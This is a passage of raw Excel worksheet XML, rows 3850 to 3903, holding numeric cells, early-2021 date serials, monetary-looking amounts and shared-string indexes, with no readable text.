        <v>11197</v>
      </c>
      <c r="E3850">
        <v>12</v>
      </c>
      <c r="F3850" t="s">
        <v>9435</v>
      </c>
      <c r="G3850" s="1">
        <v>44265</v>
      </c>
      <c r="H3850">
        <v>300000</v>
      </c>
      <c r="I3850" t="s">
        <v>9550</v>
      </c>
      <c r="J3850" t="s">
        <v>13118</v>
      </c>
    </row>
    <row r="3851" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3851">
        <v>24141</v>
      </c>
      <c r="B3851">
        <v>80</v>
      </c>
      <c r="C3851" t="s">
        <v>1543</v>
      </c>
      <c r="D3851" t="s">
        <v>11197</v>
      </c>
      <c r="E3851">
        <v>12</v>
      </c>
      <c r="F3851" t="s">
        <v>9459</v>
      </c>
      <c r="G3851" s="1">
        <v>44265</v>
      </c>
      <c r="H3851">
        <v>300000</v>
      </c>
      <c r="I3851" t="s">
        <v>9550</v>
      </c>
      <c r="J3851" t="s">
        <v>13119</v>
      </c>
    </row>
    <row r="3852" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3852">
        <v>24142</v>
      </c>
      <c r="B3852">
        <v>80</v>
      </c>
      <c r="C3852" t="s">
        <v>1543</v>
      </c>
      <c r="D3852" t="s">
        <v>11197</v>
      </c>
      <c r="E3852">
        <v>12</v>
      </c>
      <c r="F3852" t="s">
        <v>764</v>
      </c>
      <c r="G3852" s="1">
        <v>44265</v>
      </c>
      <c r="H3852">
        <v>200000</v>
      </c>
      <c r="I3852" t="s">
        <v>9550</v>
      </c>
      <c r="J3852" t="s">
        <v>13120</v>
      </c>
    </row>
    <row r="3853" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3853">
        <v>24143</v>
      </c>
      <c r="B3853">
        <v>80</v>
      </c>
      <c r="C3853" t="s">
        <v>1543</v>
      </c>
      <c r="D3853" t="s">
        <v>11197</v>
      </c>
      <c r="E3853">
        <v>12</v>
      </c>
      <c r="F3853" t="s">
        <v>3204</v>
      </c>
      <c r="G3853" s="1">
        <v>44265</v>
      </c>
      <c r="H3853">
        <v>25000</v>
      </c>
      <c r="I3853" t="s">
        <v>9550</v>
      </c>
      <c r="J3853" t="s">
        <v>13121</v>
      </c>
    </row>
    <row r="3854" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3854">
        <v>24144</v>
      </c>
      <c r="B3854">
        <v>80</v>
      </c>
      <c r="C3854" t="s">
        <v>1543</v>
      </c>
      <c r="D3854" t="s">
        <v>11197</v>
      </c>
      <c r="E3854">
        <v>12</v>
      </c>
      <c r="F3854" t="s">
        <v>1139</v>
      </c>
      <c r="G3854" s="1">
        <v>44265</v>
      </c>
      <c r="H3854">
        <v>50000</v>
      </c>
    </row>
    <row r="3855" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3855">
        <v>24145</v>
      </c>
      <c r="B3855">
        <v>80</v>
      </c>
      <c r="C3855" t="s">
        <v>1543</v>
      </c>
      <c r="D3855" t="s">
        <v>11197</v>
      </c>
      <c r="E3855">
        <v>12</v>
      </c>
      <c r="F3855" t="s">
        <v>13122</v>
      </c>
      <c r="G3855" s="1">
        <v>44265</v>
      </c>
      <c r="H3855">
        <v>10000</v>
      </c>
    </row>
    <row r="3856" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3856">
        <v>24147</v>
      </c>
      <c r="B3856">
        <v>540</v>
      </c>
      <c r="C3856" t="s">
        <v>2250</v>
      </c>
      <c r="D3856" t="s">
        <v>13123</v>
      </c>
      <c r="E3856">
        <v>26</v>
      </c>
      <c r="F3856" t="s">
        <v>3499</v>
      </c>
      <c r="G3856" s="1">
        <v>44299</v>
      </c>
      <c r="H3856">
        <v>99000</v>
      </c>
      <c r="J3856" t="s">
        <v>13124</v>
      </c>
    </row>
    <row r="3857" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3857">
        <v>24148</v>
      </c>
      <c r="B3857">
        <v>540</v>
      </c>
      <c r="C3857" t="s">
        <v>2250</v>
      </c>
      <c r="D3857" t="s">
        <v>13123</v>
      </c>
      <c r="E3857">
        <v>26</v>
      </c>
      <c r="F3857" t="s">
        <v>9497</v>
      </c>
      <c r="G3857" s="1">
        <v>44299</v>
      </c>
      <c r="H3857">
        <v>60000</v>
      </c>
      <c r="J3857" t="s">
        <v>13125</v>
      </c>
    </row>
    <row r="3858" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3858">
        <v>24149</v>
      </c>
      <c r="B3858">
        <v>540</v>
      </c>
      <c r="C3858" t="s">
        <v>2250</v>
      </c>
      <c r="D3858" t="s">
        <v>13123</v>
      </c>
      <c r="E3858">
        <v>26</v>
      </c>
      <c r="F3858" t="s">
        <v>13126</v>
      </c>
      <c r="G3858" s="1">
        <v>44299</v>
      </c>
      <c r="H3858">
        <v>0</v>
      </c>
    </row>
    <row r="3859" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3859">
        <v>24150</v>
      </c>
      <c r="B3859">
        <v>1078</v>
      </c>
      <c r="C3859" t="s">
        <v>3978</v>
      </c>
      <c r="D3859" t="s">
        <v>13127</v>
      </c>
      <c r="E3859">
        <v>14</v>
      </c>
      <c r="F3859" t="s">
        <v>5647</v>
      </c>
      <c r="G3859" s="1">
        <v>44286</v>
      </c>
      <c r="H3859">
        <v>1000</v>
      </c>
      <c r="I3859" t="s">
        <v>9477</v>
      </c>
    </row>
    <row r="3860" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3860">
        <v>24151</v>
      </c>
      <c r="B3860">
        <v>1078</v>
      </c>
      <c r="C3860" t="s">
        <v>3978</v>
      </c>
      <c r="D3860" t="s">
        <v>13127</v>
      </c>
      <c r="E3860">
        <v>14</v>
      </c>
      <c r="F3860" t="s">
        <v>13128</v>
      </c>
      <c r="G3860" s="1">
        <v>44286</v>
      </c>
      <c r="H3860">
        <v>1000</v>
      </c>
      <c r="I3860" t="s">
        <v>9477</v>
      </c>
    </row>
    <row r="3861" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3861">
        <v>24153</v>
      </c>
      <c r="B3861">
        <v>495</v>
      </c>
      <c r="C3861" t="s">
        <v>16517</v>
      </c>
      <c r="D3861" t="s">
        <v>16519</v>
      </c>
      <c r="E3861">
        <v>26</v>
      </c>
      <c r="F3861" t="s">
        <v>13129</v>
      </c>
      <c r="G3861" s="1">
        <v>44267</v>
      </c>
      <c r="H3861" s="4">
        <v>200000</v>
      </c>
      <c r="J3861" t="s">
        <v>13130</v>
      </c>
    </row>
    <row r="3862" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3862">
        <v>24154</v>
      </c>
      <c r="B3862">
        <v>540</v>
      </c>
      <c r="C3862" t="s">
        <v>2250</v>
      </c>
      <c r="D3862" t="s">
        <v>13123</v>
      </c>
      <c r="E3862">
        <v>26</v>
      </c>
      <c r="F3862" t="s">
        <v>13131</v>
      </c>
      <c r="G3862" s="1">
        <v>44299</v>
      </c>
      <c r="H3862">
        <v>0</v>
      </c>
      <c r="J3862" t="s">
        <v>13132</v>
      </c>
    </row>
    <row r="3863" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3863">
        <v>24155</v>
      </c>
      <c r="B3863">
        <v>540</v>
      </c>
      <c r="C3863" t="s">
        <v>2250</v>
      </c>
      <c r="D3863" t="s">
        <v>13123</v>
      </c>
      <c r="E3863">
        <v>26</v>
      </c>
      <c r="F3863" t="s">
        <v>13133</v>
      </c>
      <c r="G3863" s="1">
        <v>44299</v>
      </c>
      <c r="H3863">
        <v>0</v>
      </c>
      <c r="J3863" t="s">
        <v>13134</v>
      </c>
    </row>
    <row r="3864" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3864">
        <v>24156</v>
      </c>
      <c r="B3864">
        <v>540</v>
      </c>
      <c r="C3864" t="s">
        <v>2250</v>
      </c>
      <c r="D3864" t="s">
        <v>13123</v>
      </c>
      <c r="E3864">
        <v>26</v>
      </c>
      <c r="F3864" t="s">
        <v>13135</v>
      </c>
      <c r="G3864" s="1">
        <v>44299</v>
      </c>
      <c r="H3864">
        <v>0</v>
      </c>
    </row>
    <row r="3865" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3865">
        <v>24157</v>
      </c>
      <c r="B3865">
        <v>540</v>
      </c>
      <c r="C3865" t="s">
        <v>2250</v>
      </c>
      <c r="D3865" t="s">
        <v>13123</v>
      </c>
      <c r="E3865">
        <v>26</v>
      </c>
      <c r="F3865" t="s">
        <v>9610</v>
      </c>
      <c r="G3865" s="1">
        <v>44299</v>
      </c>
      <c r="H3865">
        <v>0</v>
      </c>
      <c r="J3865" t="s">
        <v>13136</v>
      </c>
    </row>
    <row r="3866" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3866">
        <v>24158</v>
      </c>
      <c r="B3866">
        <v>540</v>
      </c>
      <c r="C3866" t="s">
        <v>2250</v>
      </c>
      <c r="D3866" t="s">
        <v>13123</v>
      </c>
      <c r="E3866">
        <v>26</v>
      </c>
      <c r="F3866" t="s">
        <v>10304</v>
      </c>
      <c r="G3866" s="1">
        <v>44299</v>
      </c>
      <c r="H3866">
        <v>0</v>
      </c>
      <c r="J3866" t="s">
        <v>13134</v>
      </c>
    </row>
    <row r="3867" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3867">
        <v>24159</v>
      </c>
      <c r="B3867">
        <v>495</v>
      </c>
      <c r="C3867" t="s">
        <v>16517</v>
      </c>
      <c r="D3867" t="s">
        <v>16519</v>
      </c>
      <c r="E3867">
        <v>26</v>
      </c>
      <c r="F3867" t="s">
        <v>364</v>
      </c>
      <c r="G3867" s="1">
        <v>44267</v>
      </c>
      <c r="H3867" s="4">
        <v>500000</v>
      </c>
      <c r="J3867" t="s">
        <v>13130</v>
      </c>
    </row>
    <row r="3868" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3868">
        <v>24160</v>
      </c>
      <c r="B3868">
        <v>495</v>
      </c>
      <c r="C3868" t="s">
        <v>16517</v>
      </c>
      <c r="D3868" t="s">
        <v>16519</v>
      </c>
      <c r="E3868">
        <v>26</v>
      </c>
      <c r="F3868" t="s">
        <v>9681</v>
      </c>
      <c r="G3868" s="1">
        <v>44267</v>
      </c>
      <c r="H3868" s="4">
        <v>100000</v>
      </c>
      <c r="J3868" t="s">
        <v>13130</v>
      </c>
    </row>
    <row r="3869" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3869">
        <v>24167</v>
      </c>
      <c r="B3869">
        <v>2597</v>
      </c>
      <c r="C3869" t="s">
        <v>16454</v>
      </c>
      <c r="D3869" t="s">
        <v>16455</v>
      </c>
      <c r="E3869">
        <v>16</v>
      </c>
      <c r="F3869" t="s">
        <v>13137</v>
      </c>
      <c r="G3869" s="1">
        <v>44294</v>
      </c>
      <c r="H3869" s="4">
        <v>1000000</v>
      </c>
      <c r="I3869" t="s">
        <v>9933</v>
      </c>
      <c r="J3869" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3870" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3870">
        <v>24168</v>
      </c>
      <c r="B3870">
        <v>2597</v>
      </c>
      <c r="C3870" t="s">
        <v>16454</v>
      </c>
      <c r="D3870" t="s">
        <v>16455</v>
      </c>
      <c r="E3870">
        <v>16</v>
      </c>
      <c r="F3870" t="s">
        <v>9586</v>
      </c>
      <c r="G3870" s="1">
        <v>44294</v>
      </c>
      <c r="H3870" s="4">
        <v>1000000</v>
      </c>
      <c r="I3870" t="s">
        <v>9933</v>
      </c>
      <c r="J3870" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3871" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3871">
        <v>24169</v>
      </c>
      <c r="B3871">
        <v>2597</v>
      </c>
      <c r="C3871" t="s">
        <v>16454</v>
      </c>
      <c r="D3871" t="s">
        <v>16455</v>
      </c>
      <c r="E3871">
        <v>16</v>
      </c>
      <c r="F3871" t="s">
        <v>2236</v>
      </c>
      <c r="G3871" s="1">
        <v>44294</v>
      </c>
      <c r="H3871" s="4">
        <v>1000000</v>
      </c>
      <c r="I3871" t="s">
        <v>9933</v>
      </c>
      <c r="J3871" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3872" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3872">
        <v>24170</v>
      </c>
      <c r="B3872">
        <v>495</v>
      </c>
      <c r="C3872" t="s">
        <v>16517</v>
      </c>
      <c r="D3872" t="s">
        <v>16519</v>
      </c>
      <c r="E3872">
        <v>26</v>
      </c>
      <c r="F3872" t="s">
        <v>3814</v>
      </c>
      <c r="G3872" s="1">
        <v>44267</v>
      </c>
      <c r="H3872" s="4">
        <v>500000</v>
      </c>
      <c r="J3872" t="s">
        <v>13130</v>
      </c>
    </row>
    <row r="3873" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3873">
        <v>24171</v>
      </c>
      <c r="B3873">
        <v>495</v>
      </c>
      <c r="C3873" t="s">
        <v>16517</v>
      </c>
      <c r="D3873" t="s">
        <v>16519</v>
      </c>
      <c r="E3873">
        <v>26</v>
      </c>
      <c r="F3873" t="s">
        <v>1746</v>
      </c>
      <c r="G3873" s="1">
        <v>44267</v>
      </c>
      <c r="H3873" s="4">
        <v>500000</v>
      </c>
      <c r="J3873" t="s">
        <v>13130</v>
      </c>
    </row>
    <row r="3874" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3874">
        <v>24172</v>
      </c>
      <c r="B3874">
        <v>495</v>
      </c>
      <c r="C3874" t="s">
        <v>16517</v>
      </c>
      <c r="D3874" t="s">
        <v>16520</v>
      </c>
      <c r="E3874">
        <v>26</v>
      </c>
      <c r="F3874" t="s">
        <v>3499</v>
      </c>
      <c r="G3874" s="1">
        <v>44267</v>
      </c>
      <c r="H3874" s="4">
        <v>500000</v>
      </c>
      <c r="J3874" t="s">
        <v>13130</v>
      </c>
    </row>
    <row r="3875" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3875">
        <v>24173</v>
      </c>
      <c r="B3875">
        <v>1249</v>
      </c>
      <c r="C3875" t="s">
        <v>4200</v>
      </c>
      <c r="D3875" t="s">
        <v>13138</v>
      </c>
      <c r="E3875">
        <v>11</v>
      </c>
      <c r="F3875" t="s">
        <v>9504</v>
      </c>
      <c r="G3875" s="1">
        <v>44292</v>
      </c>
      <c r="H3875">
        <v>100</v>
      </c>
      <c r="J3875" t="s">
        <v>13139</v>
      </c>
    </row>
    <row r="3876" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3876">
        <v>24174</v>
      </c>
      <c r="B3876">
        <v>1249</v>
      </c>
      <c r="C3876" t="s">
        <v>4200</v>
      </c>
      <c r="D3876" t="s">
        <v>13138</v>
      </c>
      <c r="E3876">
        <v>11</v>
      </c>
      <c r="F3876" t="s">
        <v>13140</v>
      </c>
      <c r="G3876" s="1">
        <v>44292</v>
      </c>
      <c r="H3876">
        <v>100</v>
      </c>
      <c r="J3876" t="s">
        <v>13141</v>
      </c>
    </row>
    <row r="3877" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3877">
        <v>24175</v>
      </c>
      <c r="B3877">
        <v>1249</v>
      </c>
      <c r="C3877" t="s">
        <v>4200</v>
      </c>
      <c r="D3877" t="s">
        <v>13138</v>
      </c>
      <c r="E3877">
        <v>11</v>
      </c>
      <c r="F3877" t="s">
        <v>9217</v>
      </c>
      <c r="G3877" s="1">
        <v>44292</v>
      </c>
      <c r="H3877">
        <v>10000</v>
      </c>
      <c r="J3877" t="s">
        <v>13141</v>
      </c>
    </row>
    <row r="3878" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3878">
        <v>24176</v>
      </c>
      <c r="B3878">
        <v>1249</v>
      </c>
      <c r="C3878" t="s">
        <v>4200</v>
      </c>
      <c r="D3878" t="s">
        <v>13138</v>
      </c>
      <c r="E3878">
        <v>11</v>
      </c>
      <c r="F3878" t="s">
        <v>9454</v>
      </c>
      <c r="G3878" s="1">
        <v>44292</v>
      </c>
      <c r="H3878">
        <v>10000</v>
      </c>
      <c r="J3878" t="s">
        <v>13141</v>
      </c>
    </row>
    <row r="3879" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3879">
        <v>24177</v>
      </c>
      <c r="B3879">
        <v>1249</v>
      </c>
      <c r="C3879" t="s">
        <v>4200</v>
      </c>
      <c r="D3879" t="s">
        <v>13138</v>
      </c>
      <c r="E3879">
        <v>11</v>
      </c>
      <c r="F3879" t="s">
        <v>12158</v>
      </c>
      <c r="G3879" s="1">
        <v>44292</v>
      </c>
      <c r="H3879">
        <v>10000</v>
      </c>
      <c r="J3879" t="s">
        <v>13141</v>
      </c>
    </row>
    <row r="3880" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3880">
        <v>24178</v>
      </c>
      <c r="B3880">
        <v>1249</v>
      </c>
      <c r="C3880" t="s">
        <v>4200</v>
      </c>
      <c r="D3880" t="s">
        <v>13138</v>
      </c>
      <c r="E3880">
        <v>11</v>
      </c>
      <c r="F3880" t="s">
        <v>9466</v>
      </c>
      <c r="G3880" s="1">
        <v>44292</v>
      </c>
      <c r="H3880">
        <v>10000</v>
      </c>
      <c r="J3880" t="s">
        <v>13141</v>
      </c>
    </row>
    <row r="3881" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3881">
        <v>24179</v>
      </c>
      <c r="B3881">
        <v>1249</v>
      </c>
      <c r="C3881" t="s">
        <v>4200</v>
      </c>
      <c r="D3881" t="s">
        <v>13138</v>
      </c>
      <c r="E3881">
        <v>11</v>
      </c>
      <c r="F3881" t="s">
        <v>13142</v>
      </c>
      <c r="G3881" s="1">
        <v>44292</v>
      </c>
      <c r="H3881">
        <v>10000</v>
      </c>
      <c r="J3881" t="s">
        <v>12327</v>
      </c>
    </row>
    <row r="3882" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3882">
        <v>24180</v>
      </c>
      <c r="B3882">
        <v>1249</v>
      </c>
      <c r="C3882" t="s">
        <v>4200</v>
      </c>
      <c r="D3882" t="s">
        <v>13138</v>
      </c>
      <c r="E3882">
        <v>11</v>
      </c>
      <c r="F3882" t="s">
        <v>7613</v>
      </c>
      <c r="G3882" s="1">
        <v>44292</v>
      </c>
      <c r="H3882">
        <v>10000</v>
      </c>
      <c r="J3882" t="s">
        <v>13141</v>
      </c>
    </row>
    <row r="3883" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3883">
        <v>24181</v>
      </c>
      <c r="B3883">
        <v>1249</v>
      </c>
      <c r="C3883" t="s">
        <v>4200</v>
      </c>
      <c r="D3883" t="s">
        <v>13138</v>
      </c>
      <c r="E3883">
        <v>11</v>
      </c>
      <c r="F3883" t="s">
        <v>5434</v>
      </c>
      <c r="G3883" s="1">
        <v>44292</v>
      </c>
      <c r="H3883">
        <v>10000</v>
      </c>
      <c r="J3883" t="s">
        <v>11207</v>
      </c>
    </row>
    <row r="3884" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3884">
        <v>24182</v>
      </c>
      <c r="B3884">
        <v>5304</v>
      </c>
      <c r="C3884" t="s">
        <v>8539</v>
      </c>
      <c r="D3884" t="s">
        <v>13143</v>
      </c>
      <c r="E3884">
        <v>12</v>
      </c>
      <c r="F3884" t="s">
        <v>13144</v>
      </c>
      <c r="G3884" s="1">
        <v>44265</v>
      </c>
      <c r="H3884">
        <v>15000</v>
      </c>
      <c r="I3884" t="s">
        <v>9550</v>
      </c>
      <c r="J3884" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3885" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3885">
        <v>24183</v>
      </c>
      <c r="B3885">
        <v>5304</v>
      </c>
      <c r="C3885" t="s">
        <v>8539</v>
      </c>
      <c r="D3885" t="s">
        <v>13143</v>
      </c>
      <c r="E3885">
        <v>12</v>
      </c>
      <c r="F3885" t="s">
        <v>13146</v>
      </c>
      <c r="G3885" s="1">
        <v>44265</v>
      </c>
      <c r="H3885">
        <v>15000</v>
      </c>
      <c r="J3885" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3886" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3886">
        <v>24184</v>
      </c>
      <c r="B3886">
        <v>5304</v>
      </c>
      <c r="C3886" t="s">
        <v>8539</v>
      </c>
      <c r="D3886" t="s">
        <v>13143</v>
      </c>
      <c r="E3886">
        <v>12</v>
      </c>
      <c r="F3886" t="s">
        <v>9595</v>
      </c>
      <c r="G3886" s="1">
        <v>44265</v>
      </c>
      <c r="H3886">
        <v>10000</v>
      </c>
      <c r="J3886" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3887" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3887">
        <v>24185</v>
      </c>
      <c r="B3887">
        <v>5304</v>
      </c>
      <c r="C3887" t="s">
        <v>8539</v>
      </c>
      <c r="D3887" t="s">
        <v>13143</v>
      </c>
      <c r="E3887">
        <v>12</v>
      </c>
      <c r="F3887" t="s">
        <v>1746</v>
      </c>
      <c r="G3887" s="1">
        <v>44265</v>
      </c>
      <c r="H3887">
        <v>15000</v>
      </c>
      <c r="J3887" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3888" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3888">
        <v>24186</v>
      </c>
      <c r="B3888">
        <v>5304</v>
      </c>
      <c r="C3888" t="s">
        <v>8539</v>
      </c>
      <c r="D3888" t="s">
        <v>13143</v>
      </c>
      <c r="E3888">
        <v>12</v>
      </c>
      <c r="F3888" t="s">
        <v>9437</v>
      </c>
      <c r="G3888" s="1">
        <v>44265</v>
      </c>
      <c r="H3888">
        <v>15000</v>
      </c>
      <c r="J3888" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3889" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3889">
        <v>24187</v>
      </c>
      <c r="B3889">
        <v>5304</v>
      </c>
      <c r="C3889" t="s">
        <v>8539</v>
      </c>
      <c r="D3889" t="s">
        <v>13143</v>
      </c>
      <c r="E3889">
        <v>12</v>
      </c>
      <c r="F3889" t="s">
        <v>2236</v>
      </c>
      <c r="G3889" s="1">
        <v>44265</v>
      </c>
      <c r="H3889">
        <v>15000</v>
      </c>
      <c r="J3889" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3890" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3890">
        <v>24188</v>
      </c>
      <c r="B3890">
        <v>5304</v>
      </c>
      <c r="C3890" t="s">
        <v>8539</v>
      </c>
      <c r="D3890" t="s">
        <v>13143</v>
      </c>
      <c r="E3890">
        <v>12</v>
      </c>
      <c r="F3890" t="s">
        <v>9459</v>
      </c>
      <c r="G3890" s="1">
        <v>44265</v>
      </c>
      <c r="H3890">
        <v>10000</v>
      </c>
      <c r="J3890" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3891" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3891">
        <v>24189</v>
      </c>
      <c r="B3891">
        <v>5304</v>
      </c>
      <c r="C3891" t="s">
        <v>8539</v>
      </c>
      <c r="D3891" t="s">
        <v>13143</v>
      </c>
      <c r="E3891">
        <v>12</v>
      </c>
      <c r="F3891" t="s">
        <v>9435</v>
      </c>
      <c r="G3891" s="1">
        <v>44265</v>
      </c>
      <c r="H3891">
        <v>10000</v>
      </c>
      <c r="J3891" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3892" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3892">
        <v>24190</v>
      </c>
      <c r="B3892">
        <v>5304</v>
      </c>
      <c r="C3892" t="s">
        <v>8539</v>
      </c>
      <c r="D3892" t="s">
        <v>13143</v>
      </c>
      <c r="E3892">
        <v>12</v>
      </c>
      <c r="F3892" t="s">
        <v>764</v>
      </c>
      <c r="G3892" s="1">
        <v>44265</v>
      </c>
      <c r="H3892">
        <v>10000</v>
      </c>
      <c r="J3892" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="3893" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3893">
        <v>24191</v>
      </c>
      <c r="B3893">
        <v>5304</v>
      </c>
      <c r="C3893" t="s">
        <v>8539</v>
      </c>
      <c r="D3893" t="s">
        <v>13143</v>
      </c>
      <c r="E3893">
        <v>12</v>
      </c>
      <c r="F3893" t="s">
        <v>8562</v>
      </c>
      <c r="G3893" s="1">
        <v>44265</v>
      </c>
      <c r="H3893">
        <v>5000</v>
      </c>
      <c r="J3893" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3894" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3894">
        <v>24192</v>
      </c>
      <c r="B3894">
        <v>5304</v>
      </c>
      <c r="C3894" t="s">
        <v>8539</v>
      </c>
      <c r="D3894" t="s">
        <v>13143</v>
      </c>
      <c r="E3894">
        <v>12</v>
      </c>
      <c r="F3894" t="s">
        <v>609</v>
      </c>
      <c r="G3894" s="1">
        <v>44265</v>
      </c>
      <c r="H3894">
        <v>10000</v>
      </c>
      <c r="J3894" t="s">
        <v>13145</v>
      </c>
    </row>
    <row r="3895" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3895">
        <v>24193</v>
      </c>
      <c r="B3895">
        <v>1327</v>
      </c>
      <c r="C3895" t="s">
        <v>4285</v>
      </c>
      <c r="D3895" t="s">
        <v>13147</v>
      </c>
      <c r="E3895">
        <v>12</v>
      </c>
      <c r="F3895" t="s">
        <v>2236</v>
      </c>
      <c r="G3895" s="1">
        <v>44287</v>
      </c>
      <c r="H3895">
        <v>93600</v>
      </c>
      <c r="I3895" t="s">
        <v>13148</v>
      </c>
      <c r="J3895" t="s">
        <v>13149</v>
      </c>
    </row>
    <row r="3896" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3896">
        <v>24194</v>
      </c>
      <c r="B3896">
        <v>1327</v>
      </c>
      <c r="C3896" t="s">
        <v>4285</v>
      </c>
      <c r="D3896" t="s">
        <v>13147</v>
      </c>
      <c r="E3896">
        <v>12</v>
      </c>
      <c r="F3896" t="s">
        <v>13150</v>
      </c>
      <c r="G3896" s="1">
        <v>44287</v>
      </c>
      <c r="H3896">
        <v>950400</v>
      </c>
      <c r="I3896" t="s">
        <v>13148</v>
      </c>
      <c r="J3896" t="s">
        <v>13149</v>
      </c>
    </row>
    <row r="3897" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3897">
        <v>24195</v>
      </c>
      <c r="B3897">
        <v>5168</v>
      </c>
      <c r="C3897" t="s">
        <v>8553</v>
      </c>
      <c r="D3897" t="s">
        <v>13151</v>
      </c>
      <c r="E3897">
        <v>29</v>
      </c>
      <c r="F3897" t="s">
        <v>364</v>
      </c>
      <c r="G3897" s="1">
        <v>44251</v>
      </c>
      <c r="H3897">
        <v>300000</v>
      </c>
      <c r="J3897" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3898" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3898">
        <v>24196</v>
      </c>
      <c r="B3898">
        <v>5306</v>
      </c>
      <c r="C3898" t="s">
        <v>8560</v>
      </c>
      <c r="D3898" t="s">
        <v>13152</v>
      </c>
      <c r="E3898">
        <v>14</v>
      </c>
      <c r="F3898" t="s">
        <v>8562</v>
      </c>
      <c r="G3898" s="1">
        <v>44263</v>
      </c>
      <c r="H3898">
        <v>1250</v>
      </c>
      <c r="J3898" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="3899" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3899">
        <v>24197</v>
      </c>
      <c r="B3899">
        <v>2367</v>
      </c>
      <c r="C3899" t="s">
        <v>6093</v>
      </c>
      <c r="D3899" t="s">
        <v>13026</v>
      </c>
      <c r="E3899">
        <v>11</v>
      </c>
      <c r="F3899" t="s">
        <v>1746</v>
      </c>
      <c r="G3899" s="1">
        <v>44287</v>
      </c>
      <c r="H3899">
        <v>50000</v>
      </c>
      <c r="J3899" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="3900" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3900">
        <v>24198</v>
      </c>
      <c r="B3900">
        <v>2367</v>
      </c>
      <c r="C3900" t="s">
        <v>6093</v>
      </c>
      <c r="D3900" t="s">
        <v>13026</v>
      </c>
      <c r="E3900">
        <v>11</v>
      </c>
      <c r="F3900" t="s">
        <v>9435</v>
      </c>
      <c r="G3900" s="1">
        <v>44287</v>
      </c>
      <c r="H3900">
        <v>40000</v>
      </c>
      <c r="J3900" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="3901" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3901">
        <v>24199</v>
      </c>
      <c r="B3901">
        <v>2367</v>
      </c>
      <c r="C3901" t="s">
        <v>6093</v>
      </c>
      <c r="D3901" t="s">
        <v>13026</v>
      </c>
      <c r="E3901">
        <v>11</v>
      </c>
      <c r="F3901" t="s">
        <v>9505</v>
      </c>
      <c r="G3901" s="1">
        <v>44287</v>
      </c>
      <c r="H3901">
        <v>30000</v>
      </c>
      <c r="J3901" t="s">
        <v>11198</v>
      </c>
    </row>
    <row r="3902" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3902">
        <v>24200</v>
      </c>
      <c r="B3902">
        <v>5309</v>
      </c>
      <c r="C3902" t="s">
        <v>8546</v>
      </c>
      <c r="D3902" t="s">
        <v>13153</v>
      </c>
      <c r="E3902">
        <v>33</v>
      </c>
      <c r="F3902" t="s">
        <v>7241</v>
      </c>
      <c r="G3902" s="1">
        <v>44281</v>
      </c>
      <c r="H3902">
        <v>50000</v>
      </c>
      <c r="I3902" t="s">
        <v>9550</v>
      </c>
      <c r="J3902" t="s">
        <v>13154</v>
      </c>
    </row>
    <row r="3903" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3903">
        <v>24201</v>
      </c>
      <c r="B3903">
